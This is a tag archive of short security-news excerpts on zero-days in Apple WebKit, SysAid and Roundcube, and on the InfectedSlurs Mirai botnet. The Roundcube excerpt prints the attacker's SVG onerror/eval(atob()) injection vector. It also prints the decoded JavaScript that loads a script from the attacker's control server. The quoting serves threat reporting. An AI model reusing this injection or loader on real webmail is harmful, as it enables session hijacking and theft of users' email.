Tag Archive for: Exploits

Apple Security Update Fixes Zero-Day Webkit Exploits

/in


Apple recommends users update to iOS 17.1.2, iPadOS 17.1.2 and macOS 14.1.2. Google’s Threat Analysis Group discovered these security bugs.

Apple has patched two zero-day vulnerabilities affecting iOS, iPadOS and macOS; users are advised to update to iOS 17.1.2, iPadOS 17.1.2 and macOS 14.1.2. The vulnerabilities were discovered by Google’s Threat Analysis group, which has been working on fixes for active Chrome vulnerabilities this week as well.

Jump to:

What are these Apple OS vulnerabilities?

“Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1,” according to Apple’s post about the security updates on Nov. 30. This implies that attackers may be actively using the vulnerabilities.

Apple’s update said the problem originated in WebKit, the engine used for Apple’s browsers, where “processing web content may lead to arbitrary code execution.” The updates fix an out-of-bounds read through improved input validation and repair a memory corruption vulnerability using improved locking.

SEE: Attackers have launched eavesdropping attacks on Apple devices over the last year. (TechRepublic) 

The first vulnerability, the out-of-bounds read, is tracked as CVE-2023-42916. The update addressing it is available for:

  • iPhone XS and later.
  • iPad Pro 12.9-inch 2nd generation and later.
  • iPad Pro 10.5-inch.
  • iPad Pro 11-inch 1st generation and later.
  • iPad Air 3rd generation and later.
  • iPad 6th generation and later.
  • iPad mini 5th generation and later.

The second vulnerability, the memory corruption, is tracked as CVE-2023-42917. The update addressing it is available for:

  • iPhone XS and later.
  • iPad Pro 12.9-inch 2nd generation and later.
  • iPad Pro 10.5-inch.
  • iPad Pro 11-inch 1st generation and later.
  • iPad Air 3rd generation and later.
  • iPad 6th generation and later.
  • iPad mini 5th generation and later.

Information is sparse about the vulnerabilities, which Apple said were investigated by Clément Lecigne at Google’s Threat Analysis Group; the group’s stated mission is to “counter government-backed attacks.”

Remediation and protection against the WebKit exploits

Apple users should be sure they are…

Source…

Novel Mirai-based DDoS botnet exploits 0-days to infect routers and security cameras

/in


Threat actors are exploiting previously unknown bugs in certain routers and network video recorder (NVR) devices to build a Mirai-based distributed denial-of-service (DDoS) botnet, dubbed InfectedSlurs.

The newly discovered zero-day remote code execution vulnerabilities can be exploited if the device manufacturers’ default admin credentials have not been changed – a security measure users very often fail to take.

In a post this week, researchers at Akamai’s security intelligence response team (SIRT) said they discovered the botnet through their global honeypots last month and identified it was targeting network video recorder (NVR) devises from a specific manufacturer.

“The SIRT did a quick check for CVEs known to impact this vendor’s NVR devices and was surprised to find that we were looking at a new zero-day exploit being actively leveraged in the wild,” the researchers wrote.

Further investigation revealed a second device from a different manufacturer – a wireless LAN router designed for hotels and residential use – was also being targeted by the threat actors behind the botnet.

The researchers said they alerted the manufacturers to the respective vulnerabilities and were told by both that they expected to release patches for the affected devices next month. Until that occurred, Akamai would not identify the manufacturers.

“There is a thin line between responsible disclosing information to help defenders, and oversharing information that can enable further abuse by hordes of threat actors,” the researchers said.

In the case of the router the threat group was targeting, it was manufactured by a Japanese vendor that produced multiple switches and routers. Japan’s Computer Emergency Response Team (JPCERT) had confirmed the exploit, but Akamai did not know if more than one model in the company’s catalog was affected.

“The feature being exploited is a very common one, and it’s possible there is code reuse across product line offerings,” the researchers said.

Akamai labelled the botnet “InfectedSlurs” after the researchers discovered racial epithets and offensive language within the naming conventions used for the command-and-control domains associated with…

Source…

Lace Tempest Exploits SysAid Zero-Day Flaw

/in


In a recent revelation, SysAid, a leading IT management software provider, has unveiled a critical security threat affecting its on-premises software. The threat actor, identified as DEV-0950 or Lace Tempest by Microsoft, previously linked to the notorious Clop ransomware group, is now exploiting a zero-day vulnerability labeled CVE-2023-47246. This vulnerability, if left unaddressed, can pave the way for unauthorized access and control over systems, posing a substantial risk to organizations. In this blog post, we’ll uncover the SysAid Zero-Day flaw and will shed light on possible mitigation measures.


The Emergence of Lace Tempest Cyber Threat


SysAid, in a blog post, disclosed the active exploitation of a path traversal zero-day vulnerability by Lace Tempest. This revelation follows Microsoft’s early detection of the exploitation, prompting immediate action from SysAid. The gravity of the Lace Tempest cybersecurity

had earlier orchestrated widespread attacks on MoveIT Transfer product users, affecting numerous organizations, including U.S. government agencies.


Cybersecurity News Lace Tempest


On November 2, Microsoft detected the exploitation of the SysAid vulnerability and promptly reported it to SysAid. The threat actor, Lace Tempest, was swiftly identified as the orchestrator behind the malicious activity. The association with Clop ransomware raised concerns, considering Lace Tempest’s involvement in previous attacks that involved data theft and ransom threats.


SysAid Zero-Day Flaw Mechanism


SysAid shed light on the intricacies of the zero-day exploit in SysAid orchestrated by Lace Tempest. The threat actor employed PowerShell to obfuscate their actions, making it challenging for incident response teams to investigate effectively. The modus operandi involved uploading a WebShell-containing WAR archive into the webroot of the SysAid Tomcat web service. This, in turn, granted unauthorized access and control over the compromised system.


SysAid’s Urgent Advisory


The SysAid security update revealed the urgency to take immediate action by upgrading to the fixed version 23.3.36. The company emphasized the need for users to proactively search for indicators of compromise…

Source…

New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail

/in


After reading the technical details about this zero-day that targeted governmental entities and a think tank in Europe and learning about the Winter Vivern threat actor, get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack focused on exploiting a zero-day vulnerability in Roundcube webmail, with the result being the ability to list folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.

Jump to:

Technical details about this cyberattack exploiting a 0day in Roundcube

The threat actor starts the attack by sending a specially crafted email message with the subject line “Get started in your Outlook” and coming from “team.management@outlook(.)com” (Figure A).

Figure A

figure A ESET Roundcube.
Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, a SVG tag contains a base64-encoded malicious payload; this is hidden for the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg"> <image href="http://www.bing.com/news/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The goal of the malicious code is to trigger the onerror attribute by using an invalid URL in the x parameter.

Decoding the payload in the onerror attribute results in a line of JavaScript code that will be executed in the victim’s browser in the context of the user’s Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou’s discovery. The researcher could establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which failed to ” … properly sanitize the malicious SVG…

Source…